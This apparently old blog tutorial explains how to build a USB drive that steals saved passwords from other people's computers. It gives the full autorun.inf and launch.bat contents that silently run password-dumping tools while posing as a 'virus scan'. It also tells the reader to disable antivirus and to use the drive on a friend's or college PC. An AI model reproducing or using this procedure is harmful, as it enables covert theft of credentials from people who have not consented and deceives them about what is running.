Friday 8 February 2013

How To Use USB Drive To Hack Any Password


 

PasswordFox: PasswordFox is
a small password recovery
tool that allows you to view
the user names and
passwords stored by Mozilla
Firefox Web browser. By
default, PasswordFox displays
the passwords stored in your
current profile, but you can
easily select to watch the
passwords of any other
Firefox profile. For each
password entry, the following
information is
displayed:Record Index, Web
Site, User Name, Password,
User Name Field, Password
Field, and the Signons
filename.
Here is a step by step
procedure to create the
password hacking toolkit.
NOTE: You must temporarily
disable your Anti-Virus before
following these steps.
1. Download all the 5 tools,
extract them and copy only
the executables(.exe files) into
your USB Pendrive.
download the 5 h#cking tools
here
5 tools for hacking.zip
File Type:
Downloaded: 2
times
Size: 273.58
KB
ie: Copy the files – mspass.exe,
mailpv.exe , iepv.exe ,
pspv.exe and
passwordfox.exe into your
USB Drive.
2. Create a new Notepad and
write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad as
autorun.inf
Now copy the autorun.inf file
onto your USB pendrive.
3. Create another Notepad
and write the following text
onto it.
start mspass.exe /stext
mspass.txt
start mailpv.exe /stext
mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext
passwordfox.txt
*save the Notepad as
launch.bat
*Copy the launch.bat file also
to your USB drive.
Now your rootkit is ready and
you are all set to h#ck the
passwords. You can use this
pendrive
on your friend̢۪s PC or on your
college computer. Just follow
these steps
1. Insert the pendrive and the
autorun window will pop-up.
(This is because, we have
created
an autorun pendrive).
2. In the pop-up window,
select the first option
(Perform a Virus Scan).
3. Now all the password
h#cking tools will silently get
executed in the background
(This process
takes hardly a few seconds).
The passwords get stored in
the .TXT files.
4. Remove the pendrive and
you̢۪ll see the stored
passwords in the .TXT files.
This h#ck works on Windows
2000, XP and Vista.

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